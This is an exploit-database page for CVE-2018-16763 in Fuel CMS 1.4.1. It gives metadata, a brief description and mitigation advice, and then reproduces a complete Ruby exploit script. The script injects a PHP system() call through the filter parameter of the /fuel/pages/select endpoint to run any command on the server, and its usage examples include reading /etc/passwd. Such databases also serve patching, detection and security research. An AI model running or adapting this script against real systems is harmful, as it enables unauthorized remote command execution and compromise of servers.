header-logo
Suggest Exploit
vendor:
Fuel CMS
by:
Alexandre ZANNI
9.8
CVSS
CRITICAL
Remote Code Execution
78
CWE
Product Name: Fuel CMS
Affected Version From: <= 1.4.1
Affected Version To: 1.4.2001
Patch Exists: YES
Related CWE: CVE-2018-16763
CPE: a:fuel_cms:fuel_cms:1.4.1
Metasploit:
Other Scripts:
Tags: cve,cve2018,fuelcms,rce,edb
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://www.exploit-db.com/exploits/47138https://www.getfuelcms.com/https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1https://nvd.nist.gov/vuln/detail/CVE-2018-16763https://github.com/daylightstudio/FUEL-CMS/issues/478
Nuclei Metadata: {'max-request': 1, 'vendor': 'thedaylightstudio', 'product': 'fuel_cms'}
Platforms Tested: Ubuntu 16.04
2020

Fuel CMS 1.4.1 – Remote Code Execution (2)

This exploit allows an attacker to execute arbitrary code remotely on the target system. By sending a specially crafted request to the fuel/pages/select endpoint, the attacker can inject system commands and execute them on the server. The vulnerability affects Fuel CMS version 1.4.1 and earlier. The exploit has been tested on Ubuntu 16.04.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Fuel CMS (1.4.2 or higher) which includes a patch for this issue. Additionally, it is advisable to follow secure coding practices and input validation to prevent remote code execution vulnerabilities.
Source

Exploit-DB raw data:

# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-11-14
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu 16.04
# CVE : CVE-2018-16763
# References: https://www.exploit-db.com/exploits/47138

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

# dirty workaround to ignore Max-Age
# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
$VERBOSE = nil

doc = <<~DOCOPT
  Fuel CMS 1.4 - Remote Code Execution

  Usage:
    #{__FILE__} <url> <cmd>
    #{__FILE__} -h | --help

  Options:
    <url>         Root URL (base path) including HTTP scheme, port and root folder
    <cmd>         The system command to execute
    -h, --help    Show this screen

  Examples:
    #{__FILE__} http://example.org id
    #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
DOCOPT

def exploit(client, root_url, cmd)
  url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"

  res = client.get(url)

  /system(.+?)<div/mx.match(res.body).captures[0].chomp
end

begin
  args = Docopt.docopt(doc)
  clnt = HTTPClient.new
  puts exploit(clnt, args['<url>'], args['<cmd>'])
rescue Docopt::Exit => e
  puts e.message
end

Navigation

Suggest Exploit

Services By CQR